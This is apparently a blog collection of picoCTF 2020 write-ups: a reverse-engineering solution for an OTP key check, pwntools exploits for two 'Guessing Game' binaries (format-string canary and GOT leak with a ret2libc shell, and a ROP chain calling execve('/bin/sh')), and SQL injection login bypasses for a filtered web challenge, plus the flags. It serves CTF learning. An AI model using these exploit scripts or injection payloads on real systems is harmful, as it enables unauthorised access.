疯如初 发布的文章

OTP Implementation wp (Chinese ver.)

picoCTF - 2020 - otp write-up

前言

picoCTF是美国CMU大学举办的面向高中生的CTF竞赛,应该算是初学者水平的题。前几天做了里面的一道题感觉出的挺好的,也不算很难,有点小坑但不多。

题目来源和下载

来源:https://play.picoctf.org/events/3/challenges/challenge/92
好像每个人的下载后的文件都会不一样
我的文件(otp 和 flag.txt):otp.zip

工具

IDA Pro

分析

查壳

无壳

key 正确的条件

以下代码说明key必须要满足这两个条件:

  • length ([rbp+var_E8]) 等于 100
  • s1 等于 s2 ("mngjlepdcbcmjmmjipmmegfkjbicaemoemkkpjgnhgomlknmoepmfbcoffikhplmadmganmlojndmfahbhaancamdhfdkiancdjf")

In Disassembly,

.text:0000557E7FE4E99D                 cmp     [rbp+var_E8], 64h ; 'd'
.text:0000557E7FE4E9A4                 jnz     short loc_557E7FE4E9C6 ; if ( i == 100
.text:0000557E7FE4E9A4                                         ; line 35
.text:0000557E7FE4E9A6                 mov     eax, [rbp+var_E8] ;       && !strncmp(
.text:0000557E7FE4E9A6                                         ;             s1,
.text:0000557E7FE4E9A6                                         ;             "mngjlepdcbcmjmmjipmmegfkjbicaemoemkkpjgnhgomlknmoepmfbcoffikhplmadmganmlojndmfahbhaancamdhfdkiancdjf",
.text:0000557E7FE4E9A6                                         ;             0x64uLL) )
.text:0000557E7FE4E9A6                                         ; line 36-39
.text:0000557E7FE4E9AC                 movsxd  rdx, eax        ; n = i = [rbp+var_E8]
.text:0000557E7FE4E9AF                 lea     rax, [rbp+s1]
.text:0000557E7FE4E9B3                 lea     rsi, s2         ; "mngjlepdcbcmjmmjipmmegfkjbicaemoemkkpjg"...
.text:0000557E7FE4E9BA                 mov     rdi, rax        ; s1
.text:0000557E7FE4E9BD                 call    _strncmp        ; test if s1 equal s2
.text:0000557E7FE4E9C2                 test    eax, eax
.text:0000557E7FE4E9C4                 jz      short loc_557E7FE4E9D9 ; if i = 100 and s1 = s2,then key is correct

In Pseudocode,

if ( i == 100
  && !strncmp(
        s1,
        "mngjlepdcbcmjmmjipmmegfkjbicaemoemkkpjgnhgomlknmoepmfbcoffikhplmadmganmlojndmfahbhaancamdhfdkiancdjf",
        0x64uLL) )

分析算法 (输入: dest; 输出: s1)

分析从 0000557E7FE4E89E 到 0000557E7FE4E99B 的汇编

In Disassembly,

.text:0000557E7FE4E89E ; ---------------------------------------------------------------------------
.text:0000557E7FE4E89E
.text:0000557E7FE4E89E loc_557E7FE4E89E:                       ; CODE XREF: main+14A↓j
.text:0000557E7FE4E89E                 cmp     [rbp+var_E8], 0 ; if ( i )
.text:0000557E7FE4E89E                                         ; line 21
.text:0000557E7FE4E8A5                 jnz     short loc_557E7FE4E8E4
.text:0000557E7FE4E8A7                 mov     eax, [rbp+var_E8] ; when i equal 0
.text:0000557E7FE4E8A7                                         ; line 30
.text:0000557E7FE4E8AD                 cdqe
.text:0000557E7FE4E8AF                 movzx   eax, [rbp+rax+dest]
.text:0000557E7FE4E8B7                 movsx   eax, al
.text:0000557E7FE4E8BA                 mov     edi, eax
.text:0000557E7FE4E8BC                 call    jumble
.text:0000557E7FE4E8C1                 mov     edx, eax
.text:0000557E7FE4E8C3                 mov     eax, edx
.text:0000557E7FE4E8C5                 sar     al, 7
.text:0000557E7FE4E8C8                 shr     al, 4
.text:0000557E7FE4E8CB                 add     edx, eax
.text:0000557E7FE4E8CD                 and     edx, 0Fh
.text:0000557E7FE4E8D0                 sub     edx, eax
.text:0000557E7FE4E8D2                 mov     eax, edx
.text:0000557E7FE4E8D4                 mov     edx, eax
.text:0000557E7FE4E8D6                 mov     eax, [rbp+var_E8]
.text:0000557E7FE4E8DC                 cdqe
.text:0000557E7FE4E8DE                 mov     [rbp+rax+s1], dl
.text:0000557E7FE4E8E2                 jmp     short loc_557E7FE4E935
.text:0000557E7FE4E8E4 ; ---------------------------------------------------------------------------
.text:0000557E7FE4E8E4
.text:0000557E7FE4E8E4 loc_557E7FE4E8E4:                       ; CODE XREF: main+97↑j
.text:0000557E7FE4E8E4                 mov     eax, [rbp+var_E8] ; when i not equal 0
.text:0000557E7FE4E8E4                                         ; line 23-26
.text:0000557E7FE4E8EA                 cdqe
.text:0000557E7FE4E8EC                 movzx   eax, [rbp+rax+dest]
.text:0000557E7FE4E8F4                 movsx   eax, al
.text:0000557E7FE4E8F7                 mov     edi, eax        ; edi = dest[i]
.text:0000557E7FE4E8F9                 call    jumble          ; line 23
.text:0000557E7FE4E8FE                 movsx   edx, al
.text:0000557E7FE4E901                 mov     eax, [rbp+var_E8]
.text:0000557E7FE4E907                 sub     eax, 1
.text:0000557E7FE4E90A                 cdqe
.text:0000557E7FE4E90C                 movzx   eax, [rbp+rax+s1]
.text:0000557E7FE4E911                 movsx   eax, al         ; eax = s1[i-1]
.text:0000557E7FE4E914                 add     edx, eax        ; edx = v5
.text:0000557E7FE4E914                                         ; line 24
.text:0000557E7FE4E916                 mov     eax, edx
.text:0000557E7FE4E918                 sar     eax, 1Fh
.text:0000557E7FE4E91B                 shr     eax, 1Ch        ; line 25
.text:0000557E7FE4E91E                 add     edx, eax
.text:0000557E7FE4E920                 and     edx, 0Fh
.text:0000557E7FE4E923                 sub     edx, eax        ; line 26
.text:0000557E7FE4E925                 mov     eax, edx
.text:0000557E7FE4E927                 mov     edx, eax
.text:0000557E7FE4E929                 mov     eax, [rbp+var_E8]
.text:0000557E7FE4E92F                 cdqe
.text:0000557E7FE4E931                 mov     [rbp+rax+s1], dl ; [rbp+rax+s1] = s1[i]
.text:0000557E7FE4E935
.text:0000557E7FE4E935 loc_557E7FE4E935:                       ; CODE XREF: main+D4↑j
.text:0000557E7FE4E935                 add     [rbp+var_E8], 1 ; ++i
.text:0000557E7FE4E93C
.text:0000557E7FE4E93C loc_557E7FE4E93C:                       ; CODE XREF: main+8B↑j
.text:0000557E7FE4E93C                 mov     eax, [rbp+var_E8] ; for ( i = 0; (unsigned int)valid_char(dest[i]); ++i )
.text:0000557E7FE4E93C                                         ; line 19-32
.text:0000557E7FE4E942                 cdqe
.text:0000557E7FE4E944                 movzx   eax, [rbp+rax+dest]
.text:0000557E7FE4E94C                 movsx   eax, al
.text:0000557E7FE4E94F                 mov     edi, eax        ; edi = dest[i]
.text:0000557E7FE4E951                 call    valid_char      ; valid_char(dest[i])
.text:0000557E7FE4E956                 test    eax, eax
.text:0000557E7FE4E958                 jnz     loc_557E7FE4E89E
.text:0000557E7FE4E95E                 mov     [rbp+var_E4], 0 ; j
.text:0000557E7FE4E968                 jmp     short loc_557E7FE4E98F
.text:0000557E7FE4E96A ; ---------------------------------------------------------------------------
.text:0000557E7FE4E96A
.text:0000557E7FE4E96A loc_557E7FE4E96A:                       ; CODE XREF: main+18D↓j
.text:0000557E7FE4E96A                 mov     eax, [rbp+var_E4]
.text:0000557E7FE4E970                 cdqe
.text:0000557E7FE4E972                 movzx   eax, [rbp+rax+s1]
.text:0000557E7FE4E977                 add     eax, 61h ; 'a'
.text:0000557E7FE4E97A                 mov     edx, eax
.text:0000557E7FE4E97C                 mov     eax, [rbp+var_E4]
.text:0000557E7FE4E982                 cdqe
.text:0000557E7FE4E984                 mov     [rbp+rax+s1], dl
.text:0000557E7FE4E988                 add     [rbp+var_E4], 1
.text:0000557E7FE4E98F
.text:0000557E7FE4E98F loc_557E7FE4E98F:                       ; CODE XREF: main+15A↑j
.text:0000557E7FE4E98F                 mov     eax, [rbp+var_E4] ; for ( j = 0; j < i; ++j )
.text:0000557E7FE4E98F                                         ; line 33-34
.text:0000557E7FE4E995                 cmp     eax, [rbp+var_E8]
.text:0000557E7FE4E99B                 jl      short loc_557E7FE4E96A

In Pseudocode,

for ( i = 0; (unsigned int)valid_char(dest[i]); ++i )// test if dest[i] is 1-9 or a-f
{
  if ( i )
  {
    v4 = jumble(dest[i]);
    v5 = s1[i - 1] + v4;
    v6 = (unsigned int)((s1[i - 1] + v4) >> 31) >> 28;
    s1[i] = ((v6 + v5) & 0xF) - v6;
  }
  else
  {
    s1[0] = (char)jumble(dest[0]) % 16;
  }
}
for ( j = 0; j < i; ++j )
  s1[j] += 97;

通过分析得知输入为dest,输出为s1
接下来就可以在制作逆向算法时直接把部分以上算法直接复制进去用于穷举了。

求 Key [Java Code (Reversely:s2 => s1 => dest)] (关键部分)

写出Java代码:通过已知的s1(也就是s2)求出dest(正确的key)

求 dest[0]

s2[0] = "m" = 109
s1[0] = s2[0] - 97 = 12

输出所有可能的s1[0]
寻找当s1[0]等于12时,dest[0]的值

public static void main(String[] args)
{
        System.out.println("dest[0]|s1[0]"); 
        int[] a1s = {48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102};
        for(int i = 0; i < 16; i++)
        {
            System.out.println(a1s[i] + "|" +jumble(a1s[i]) % 16);                   
        }
}
    
public static int jumble(int a1)
{
        int v2 = a1;
        if ( a1 > 96 )                                // a-f
            v2 = a1 + 9;                                // j-o
        int v3 = 2 * (v2 % 16);
        if ( (char)v3 > 15 )
            ++v3;
        return v3;
}

Output:

dest[0]|s1[0]
48|0
49|2
50|4
51|6
52|8
53|10
54|12
55|14
56|1
57|3
97|5
98|7
99|9
100|11
101|13
102|15

结论:当 dest[0] 等于 54 (char “6”), s1[0] 等于 12.

Find dest[1]

s2[1] = "n" = 110

输出所有可能的s1[1]
寻找当s1[1]等于110时,dest[1]的值

public static void main(String[] args)
{
        s1[0] = 12;
        System.out.println("dest[1]|s1[1]"); 
        int[] a1s = {48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102};
        for(int i = 0; i < 16; i++)
        {
                getMS1IndexNotEqual0(a1s[i],1);
                System.out.println(a1s[i] + "|" +s1[1]);                   
        }
}

static int[] s1 = new int[100];

//find dest[not equal 0]
//mD = dest[i]
public static int getMS1IndexNotEqual0(int mD, int i)
{
        if(i == 0)
        {
                return -1;
        }
        int v4 = jumble(mD);
        int v5 = s1[i - 1] + v4;
        int v6 = (v5 >> 31) >>> 28;
        s1[i] = ((v6 + v5) & 0xF) - v6;
        s1[i] += 97;
        return s1[i];
}
    
public static int jumble(int a1)
{
        int v2 = a1;
        if ( a1 > 96 )                                // a-f
            v2 = a1 + 9;                                // j-o
        int v3 = 2 * (v2 % 16);
        if ( (char)v3 > 15 )
            ++v3;
        return v3;
}

Output:

dest[1]|s1[1]
48|109
49|111
50|97
51|99
52|101
53|103
54|105
55|107
56|110
57|112
97|98
98|100
99|102
100|104
101|106
102|108

结论:当 dest[1] 等于 56 (char “8”), s1[1] 等于 110.

通过编程自动求 dest[1-100] (dest[1] - dest[100])

public static void auto()
{
        s1[0] = 12;
        String s2 = "mngjlepdcbcmjmmjipmmegfkjbicaemoemkkpjgnhgomlknmoepmfbcoffikhplmadmganmlojndmfahbhaancamdhfdkiancdjf";
        char[] a1s = {48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102};
        boolean hasResult = false;
        for(int i2 = 1; i2 < 100; i2++)
        {
                hasResult = false;
            for(int i = 0; i < 16; i++)
            {
                    int s1Add97 = getMS1IndexNotEqual0(a1s[i],i2);
                    if(s2.charAt(i2) == (char)s1Add97)
                    {
                            hasResult = true;
                            System.out.print(a1s[i]);
                            break;
                    }
                    
            }
            if(hasResult == false)
                    System.out.println("NO");
        }
}

static int[] s1 = new int[100];

//find dest[not equal 0]
//mD = dest[i]
public static int getMS1IndexNotEqual0(int mD, int i)
{
        if(i == 0)
        {
                return -1;
        }
        int v4 = jumble(mD);
        int v5 = s1[i - 1] + v4;
        int v6 = (v5 >> 31) >>> 28;
        s1[i] = ((v6 + v5) & 0xF) - v6;
        //s1[i] += 97;
        return (s1[i]+97);
}

Output:

8c91cd2ff85e90efbe041faf4b572413470a5eb5f47ff9f13dec686b091e46829c55eff9d23ccdb53c0ea76b277b74ea836

dest结论

第一字符是 "6",
所以完整的dest是 "68c91cd2ff85e90efbe041faf4b572413470a5eb5f47ff9f13dec686b091e46829c55eff9d23ccdb53c0ea76b277b74ea836",也就是key

测试 key

congrats.png

求最终 Flag

逆向得知key是 "68c91cd2ff85e90efbe041faf4b572413470a5eb5f47ff9f13dec686b091e46829c55eff9d23ccdb53c0ea76b277b74ea836"
flag.txt中的内容是 "18a07fbdbcd1af759895328ec4d82d2b411dc7876c34a0ab61eda8f2efa5bb0f198a3aa0ac47ff9a0cf3d913d3138678ce4b"
异或这两个值,得到 "7069636f4354467b63757374306d5f6a756d626c33735f3472336e745f345f67304f645f316433415f33336561643136667d"

将异或的结果 ("7069636f4354467b63757374306d5f6a756d626c33735f3472336e745f345f67304f645f316433415f33336561643136667d") 从十六进制转成ASCII, 得到 "picoCTF{cust0m_jumbl3s_4r3nt_4_g0Od_1d3A_33ead16f}", 也就是最终的Flag

java code

public static void main (String[] args) {
        String str1 = "68c91cd2ff85e90efbe041faf4b572413470a5eb5f47ff9f13dec686b091e46829c55eff9d23ccdb53c0ea76b277b74ea836";
        String str2 = "18a07fbdbcd1af759895328ec4d82d2b411dc7876c34a0ab61eda8f2efa5bb0f198a3aa0ac47ff9a0cf3d913d3138678ce4b";
        String xorRes = doXor(str1,str2);
        String flag = hexToString(xorRes);
}

public static String doXor(String str1, String str2)
{
        String xorRes = StringXor(str1, str2);
        System.out.println(xorRes);
        return xorRes;
}

public static String StringXor(String str1, String str2) {
        BigInteger big1 = new BigInteger(str1, 16);
        BigInteger big2 = new BigInteger(str2, 16);
        return big1.xor(big2).toString(16);
        
}

public static String hexToString(String hex)
{
    byte[] s = DatatypeConverter.parseHexBinary(hex);
    String ret = new String(s);
    System.out.println(ret);
    return ret;
}

Output:

7069636f4354467b63757374306d5f6a756d626c33735f3472336e745f345f67304f645f316433415f33336561643136667d
picoCTF{cust0m_jumbl3s_4r3nt_4_g0Od_1d3A_33ead16f}

Gussing Game 2 wp (English ver.)

Question

Source

https://play.picoctf.org/events/3/challenges/challenge/89

Description

It's the Return of your favorite game!
Gussing Game 2.zip
nc jupiter.challenges.picoctf.org 13610

Tools

IDA
IDA remote linux debugger
vmware - kali linux
libc database search https://libc.blukat.me

Analysis

vuln

I found there is a vuln to do the buffer overflow attack and a format string vuln in win()

void win() {
char winner[BUFSIZE];
printf("New winner!

Name? ");

gets(winner);//overflow
printf("Congrats: ");
printf(winner);//format string vuln
printf("

");

}

checksec

checksec.png

find number of guess

local

Use IDA debugger to debug it and find the random number:
set a breakpoint at .text:080486A3
ida_rand.png
I found the value of eax is FFFFF9A1, which is equal to -1631

0xFFFFF9A1 xor 0xFFFFFFFF + 1 = 0x65E + 1 = 0x65F = 1631

local_rand.png

remote

Unfortunately, this is not the correct number in the remote server
remote_num_nope.png
I found the number could only in the range (-4094,4096) b/c the following code

long ans = (get_random() % 4096) + 1;

So try all possible number by using the following python code:

from pwn import *
sh = remote('jupiter.challenges.picoctf.org',13610)
for num in range(-4094,4096):
    sh.recvuntil('guess?

')

    sh.sendline(str(num))
    print(str(num))
    ret = sh.recvuntil('

')

    print(ret)
    if ret == 'Congrats! You win! Your prize is this print statement!

':

        break

remote_num_correct.png

Now, I know the random number in the remote server is -31

leck canary

I found there is a canary, so I tried to leck it by taking advantage of format string vuln.
canary_ida.png
Set a breakpoint at .text:080487D3
bp_find_canary.png
ebp+canary = FFC8BC7C
canary.png
esp = FFC8BA60
the canary can be treated as the 135th parameter (not include the format) of printf

(0xFFC8BC7C - 0xFFC8BA60)/4 = 0x87 = 135

So, the canary can be 'leck'ed by input %135$p when it asking the winner's name.
leck_canary.png

python function to leck data in the stack

from pwn import *

sh = process('./vuln')
#sh = remote('jupiter.challenges.picoctf.org',13610)
# nc jupiter.challenges.picoctf.org 13610

guess_num = '-1631'
#guess_num = '-31'

p = make_packer('all', endian='big', sign='unsigned')

def leck_by_para_num(printf_para):
    global sh
    sh.recvuntil('guess?

')

    sh.sendline(guess_num)
    sh.recvuntil('

Name? ')

    sh.sendline('%'+str(printf_para)+'$p')
    sh.recvuntil('Congrats: ')
    sh.recv(2)
    data = sh.recvuntil('

')

    data = int(data,16)
    return data

Now, the canary can be gained by call leck_by_para_num(135)

# find canary
canary = leck_by_para_num(135)

Note

The remote server has a different libc version with local, so we have to found the libc version of remote server. Then we can find the address of system() and /bin/sh in the libc, so we can do the ret2libc attack.

find address of GOT (_GLOBAL_OFFSET_TABLE_)

Try to leck some address of function from GOT (_GLOBAL_OFFSET_TABLE_)

Still break at .text:080487D3
stack_got.png
esp = FFC8BA60

(0xFFC8BC4C - 0xFFC8BA60)/4 = 0x7B = 123

So, the address of GOT can be 'leck'ed by input %123$p when it asking the winner's name.
got.png

Also can be gained by call leck_by_para_num(123)

# find GOT
GOT = leck_by_para_num(123)

find address of functions in GOT

View the GOT disassembly view
got_ida.png
I choose gets and __libc_start_main symbols.
gets is at the 0x10 offset of GOT (GOT + 0x10)
__libc_start_main is at the 0x24 offset of GOT (GOT + 0x24)
So we have to leck the data by input address. We can take advantage format string vuln again by input something include %s.

python function to leck data by input address

def leck_by_address(address):
    global sh
    sh.recvuntil('guess?

')

    sh.sendline(guess_num)
    sh.recvuntil('

Name? ')

    payload = p(0x2531302473)#char('%10$s')
    payload += p(0)*3
    payload += p(0)*4
    payload += p32(address)
    sh.sendline(payload)
    sh.recvuntil('Congrats: ')
    data = sh.recv(4)
    sh.recvuntil('

')

    data = u32(data)
    return data

So, we can find address of __libc_start_main and gets function

# find address of __libc_start_main
addr___libc_start_main = leck_by_address(GOT + 0x24)
print(hex(addr___libc_start_main))

# find address of gets
addr_gets = leck_by_address(GOT + 0x10)
print(hex(addr_gets))

python: find address of __libc_start_main and gets function

Do the following code:

addr of functions in got.png

find libc version and address of system and str_bin_sh

https://libc.blukat.me/

Do libc database search

libc database search.png

So, the libc of remote server is libc6-i386_2.27-3ubuntu1.2_amd64

offset___libc_start_main = 0x018da0
offset_system = 0x03cd80
offset_str_bin_sh = 0x17bb8f

Given addr___libc_start_main and offset___libc_start_main, we can find the base address of libc, and, then, find addr_system and addr_str_bin_sh

base_address = addr___libc_start_main - offset___libc_start_main
addr_system = base_address + offset_system
addr_str_bin_sh = base_address + offset_str_bin_sh

ret2libc

stack overflow plan

ebp-0Ch        canary
ebp+4          addr_system
ebp+0Ch        addr_str_bin_sh

python: payload

payload = p(0x90)*(0x200)    #ebp-20Ch
payload += p32(canary)    #ebp-0Ch
payload += p32(0)    #ebp-8
payload += p32(0)    #ebp-4
payload += p32(0)    #ebp
payload += p32(addr_system)    #ebp+4
payload += p32(0xdeadbeef)    #ebp+8
payload += p32(addr_str_bin_sh)    #ebp+0Ch

sh.recvuntil('guess?

')

sh.sendline(guess_num)
sh.recvuntil('

Name? ')

sh.sendline(payload)

sh.interactive()

Then we can access to shell by call system('/bin/sh')

get shell and find flag

Run the following python code:

from pwn import *

#sh = process('./vuln')
sh = remote('jupiter.challenges.picoctf.org',13610)
# nc jupiter.challenges.picoctf.org 13610

#guess_num = '-1631'
guess_num = '-31'

p = make_packer('all', endian='big', sign='unsigned')

def leck_by_para_num(printf_para):
    global sh
    sh.recvuntil('guess?

')

    sh.sendline(guess_num)
    sh.recvuntil('

Name? ')

    sh.sendline('%'+str(printf_para)+'$p')
    sh.recvuntil('Congrats: ')
    sh.recv(2)
    data = sh.recvuntil('

')

    data = int(data,16)
    return data


def leck_by_address(address):
    global sh
    sh.recvuntil('guess?

')

    sh.sendline(guess_num)
    sh.recvuntil('

Name? ')

    payload = p(0x2531302473)#char('%10$s')
    payload += p(0)*3
    payload += p(0)*4
    payload += p32(address)
    sh.sendline(payload)
    sh.recvuntil('Congrats: ')
    data = sh.recv(4)
    sh.recvuntil('

')

    data = u32(data)
    return data


# find canary
canary = leck_by_para_num(135)

# find GOT
GOT = leck_by_para_num(123)

# find address of __libc_start_main
addr___libc_start_main = leck_by_address(GOT + 0x24)

# libc is libc6-i386_2.27-3ubuntu1.2_amd64

# find address of system and str_bin_sh
offset___libc_start_main = 0x018da0
offset_system = 0x03cd80
offset_str_bin_sh = 0x17bb8f

base_address = addr___libc_start_main - offset___libc_start_main
addr_system = base_address + offset_system
addr_str_bin_sh = base_address + offset_str_bin_sh

# overflow

payload = p(0x90)*(0x200)    #ebp-20Ch
payload += p32(canary)    #ebp-0Ch
payload += p32(0)    #ebp-8
payload += p32(0)    #ebp-4
payload += p32(0)    #ebp
payload += p32(addr_system)    #ebp+4
payload += p32(0xdeadbeef)    #ebp+8
payload += p32(addr_str_bin_sh)    #ebp+0Ch

sh.recvuntil('guess?

')

sh.sendline(guess_num)
sh.recvuntil('

Name? ')

sh.sendline(payload)

sh.interactive()

flag.png

So the flag is picoCTF{p0p_r0p_4nd_dr0p_1t_3c29990aa7386650}

Guessing Game 1 wp (English ver.)

Question

Source

https://play.picoctf.org/events/3/challenges/challenge/90

Description

I made a simple game to show off my programming skills. See if you can beat it!
Gussing Game 1.zip
nc jupiter.challenges.picoctf.org 50583

Tools

IDA
VM - Kali Linux
Python
ROPgadget

Analysis

Knowledge points

Binary Exploitation
Return-oriented programming (ROP)
The goal of the Challenge Question is to run execve("/bin/sh",NULL,NULL) on the remote server.
Tips: No shellcode b/c NX is enabled: you cannot execute stack

vuln

Analysis vuln.c and found that there is a Stack Overflow Vuln:

void win() {
    char winner[BUFSIZE];
    printf("New winner!

Name? ");

    fgets(winner, 360, stdin);//overflow vuln
    printf("Congrats %s

", winner);

}

Grabbing control of eip by taking advantage of the vuln to let the program Stack Overflow.

Gadgets

Run the following commands:

ROPgadget --binary vuln --only "pop|ret"
ROPgadget --binary vuln --only "mov|ret"
ROPgadget --binary vuln --only "syscall|ret"

Do ROP to achieve the goal—execve("/bin/sh",NULL,NULL)—by using the following gadgets:

0x00000000004163f4 : pop rax ; ret
0x000000000044a6b5 : pop rdx ; ret
0x0000000000400696 : pop rdi ; ret
0x0000000000436393 : mov qword ptr [rdi], rdx ; ret
0x000000000044cc49 : pop rdx ; pop rsi ; ret
0x000000000040137c : syscall

Disassembly

do_stuff()

Input the Gussing Number "84" for the first time (you only need one time if you guess correct so you can access to win() function)

Q: Why "84"
A: Dynamic debugging (IDA debugger or GDB)
Set a breakpoint at the following position:

.text:0000000000400BBC                 mov     [rbp+var_ans], rax

rax will be equal to 84

win()

.text:0000000000400C40                 public win
.text:0000000000400C40 win             proc near               ; CODE XREF: main+70↓p
.text:0000000000400C40
.text:0000000000400C40 winner          = byte ptr -70h
.text:0000000000400C40
.text:0000000000400C40 ; __unwind {
.text:0000000000400C40                 push    rbp
.text:0000000000400C41                 mov     rbp, rsp
.text:0000000000400C44                 sub     rsp, 70h
.text:0000000000400C48                 lea     rdi, aNewWinnerName ; "New winner!

Name? "

.text:0000000000400C4F                 mov     eax, 0
.text:0000000000400C54                 call    printf
.text:0000000000400C59                 mov     rdx, cs:stdin
.text:0000000000400C60                 lea     rax, [rbp+winner]
.text:0000000000400C64                 mov     esi, 168h
.text:0000000000400C69                 mov     rdi, rax
.text:0000000000400C6C                 call    fgets
.text:0000000000400C71                 lea     rax, [rbp+winner]
.text:0000000000400C75                 mov     rsi, rax
.text:0000000000400C78                 lea     rdi, aCongratsS ; "Congrats %s

"

.text:0000000000400C7F                 mov     eax, 0
.text:0000000000400C84                 call    printf
.text:0000000000400C89                 nop
.text:0000000000400C8A                 leave
.text:0000000000400C8B                 retn
.text:0000000000400C8B ; } // starts at 400C40
.text:0000000000400C8B win             endp

The return address of the function is stored at rbp+8, so overwrite it by overflowing the stack

ROP: Gadgets

We are planning to run the following assembly code after win() return.

ret        (retn of win() at .text:0000000000400C8B)
pop rax
ret
pop rdx
ret
pop rdi
ret
mov qword ptr [rdi], rdx
ret
pop rdx
pop rsi
ret
syscall

In order to run execve("/bin/sh",NULL,NULL) successfully, rax should be equal to 59 durning syscall is running, rdi should be the pointer of "/bin/sh", and rsi and rdx should be equal to 0 (NULL).

So, we should let the Stack like this:

rbp+8        0x00000000004163f4            Address of one of Gadget
rbp+10h        59                    rax
rbp+18h        0x000000000044a6b5            Address of one of Gadget            
rbp+20h        "/bin/sh"                rdx (temporary use; will be overwrite later)
rbp+28h        0x0000000000400696            Address of one of Gadget
rbp+30h        0x00000000006BA770            rdi
rbp+38h        0x0000000000436393            Address of one of Gadget
rbp+40h        0x000000000044cc49            Address of one of Gadget
rbp+48h        0                    rdx
rbp+50h        0                    rsi
rbp+58h        0x000000000040137c            syscall

Remote to Find Flag: Python

Run the following Python program:

from pwn import *

sh = remote('jupiter.challenges.picoctf.org',50583)

p = make_packer('all', endian='big', sign='unsigned')
p64 = make_packer(64, endian='little', sign='unsigned')

payload = p(0x90)*(0x70+8)    #rbp-70h
payload += p64(0x4163f4)    #rbp+8h
payload += p64(59)            #rbp+10h
payload += p64(0x44a6b5)    #rbp+18h
payload += p(0x2F62696E2F736800)    #rbp+20h
payload += p64(0x400696)    #rbp+28h
payload += p64(0x6BA770)    #rbp+30h
payload += p64(0x436393)    #rbp+38h
payload += p64(0x44cc49)    #rbp+40h
payload += p64(0)            #rbp+48h
payload += p64(0)            #rbp+50h
payload += p64(0x40137c)    #rbp+58h

sh.recvuntil('guess?

')

sh.sendline(p(0x3834))#84

sh.recvuntil('

Name? ')

sh.sendline(payload)

sh.interactive()

result.png

So the Flag is picoCTF{r0p_y0u_l1k3_4_hurr1c4n3_1ed68bc5575f6be1}

Web Gauntlet wp (English ver.)

Source

https://play.picoctf.org/events/3/challenges/challenge/88

Question

Can you beat the filters? Log in as admin
http://jupiter.challenges.picoctf.org:50595/
http://jupiter.challenges.picoctf.org:50595/filter.php

It is actually execute the following sql in sqlite
SELECT FROM users WHERE username='[username]' AND password='[password]*'

Attempts

attempts on http://jupiter.challenges.picoctf.org:50595/index.php
After the following attempts, it responds "Congrats! You won! Check out filter.php"

Round 1

filter: Round1: or
username: admin' --
password: 1 (anything)
SELECT * FROM users WHERE username='admin' --' AND password='1'

Round 2

filter: Round2: or and like = --
username: admin'; /*
password: 1 (anything)
SELECT FROM users WHERE username='admin'; /' AND password='1'

Round 3

filter: Round3: or and = like > < --
Tips: there is a space char (" ") in the filter
username: admin';/*
password: 1 (anything)
SELECT FROM users WHERE username='admin';/' AND password='1'

Round 4

filter: Round4: or and = like > < -- admin
Tips: there is a space char (" ") in the filter
username: admi'||'n';
password: 1 (anything)
SELECT * FROM users WHERE username='admi'||'n';' AND password='1'

Round 5

filter: Round5: or and = like > < -- union admin
Tips: there is a space char (" ") in the filter
username: admi'||'n';
password: 1 (anything)
SELECT * FROM users WHERE username='admi'||'n';' AND password='1'

You Won

Round 6-5.png

Check out filter.php

<?php
session_start();

if (!isset($_SESSION["round"])) {
    $_SESSION["round"] = 1;
}
$round = $_SESSION["round"];
$filter = array("");
$view = ($_SERVER["PHP_SELF"] == "/filter.php");

if ($round === 1) {
    $filter = array("or");
    if ($view) {
        echo "Round1: ".implode(" ", $filter)."<br/>";
    }
} else if ($round === 2) {
    $filter = array("or", "and", "like", "=", "--");
    if ($view) {
        echo "Round2: ".implode(" ", $filter)."<br/>";
    }
} else if ($round === 3) {
    $filter = array(" ", "or", "and", "=", "like", ">", "<", "--");
    // $filter = array("or", "and", "=", "like", "union", "select", "insert", "delete", "if", "else", "true", "false", "admin");
    if ($view) {
        echo "Round3: ".implode(" ", $filter)."<br/>";
    }
} else if ($round === 4) {
    $filter = array(" ", "or", "and", "=", "like", ">", "<", "--", "admin");
    // $filter = array(" ", "/**/", "--", "or", "and", "=", "like", "union", "select", "insert", "delete", "if", "else", "true", "false", "admin");
    if ($view) {
        echo "Round4: ".implode(" ", $filter)."<br/>";
    }
} else if ($round === 5) {
    $filter = array(" ", "or", "and", "=", "like", ">", "<", "--", "union", "admin");
    // $filter = array("0", "unhex", "char", "/*", "*/", "--", "or", "and", "=", "like", "union", "select", "insert", "delete", "if", "else", "true", "false", "admin");
    if ($view) {
        echo "Round5: ".implode(" ", $filter)."<br/>";
    }
} else if ($round >= 6) {
    if ($view) {
        highlight_file("filter.php");
    }
} else {
    $_SESSION["round"] = 1;
}

// picoCTF{y0u_m4d3_1t_d846125f7bdbf4d6e89cbc5edb6fa739}
?>

So, the Flag is picoCTF{y0u_m4d3_1t_d846125f7bdbf4d6e89cbc5edb6fa739}